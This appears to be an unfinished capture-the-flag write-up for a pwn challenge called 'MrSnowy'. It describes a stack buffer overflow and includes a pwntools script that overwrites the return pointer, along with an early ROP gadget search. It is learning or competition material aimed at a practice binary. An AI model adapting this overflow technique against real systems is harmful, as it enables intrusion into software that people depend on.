MrSnowy

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. Something must be wrong with him.

Flag

Progress so far

The read() reads 0x108 bytes of input from stdin
- The buffer is uninitialized
- The functioncall sits at *investigate+67
The Stackframe of the function only has a size of 0x40 bytes
checksec --file=mrsnowy reports NX being enabled
- So no shellcode will be placable unless there is executable space
- This hints to ROP Chaining

The binary should be patched to get rid of the timetaking animation
- Just nop the banner() function call using radare2
Overwriting the returnpointer of investigate() using pwntools:

context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']
e = ELF("mr_snowy")
p = process(e.path)

# read banner and stuff until input is requested
def do_read():
  while True:
     ll = p.read()
     print(ll)
     if b'>' in ll:
       break

# if not patched wait for the animation and send 1
do_read()
p.sendline('1')
do_read()

# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))

# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()

Trying to find ROP Gadgets using pwntools

e = ELF("mr_snowy")
rop = ROP(elf)
rop.rbx
rop.gadgets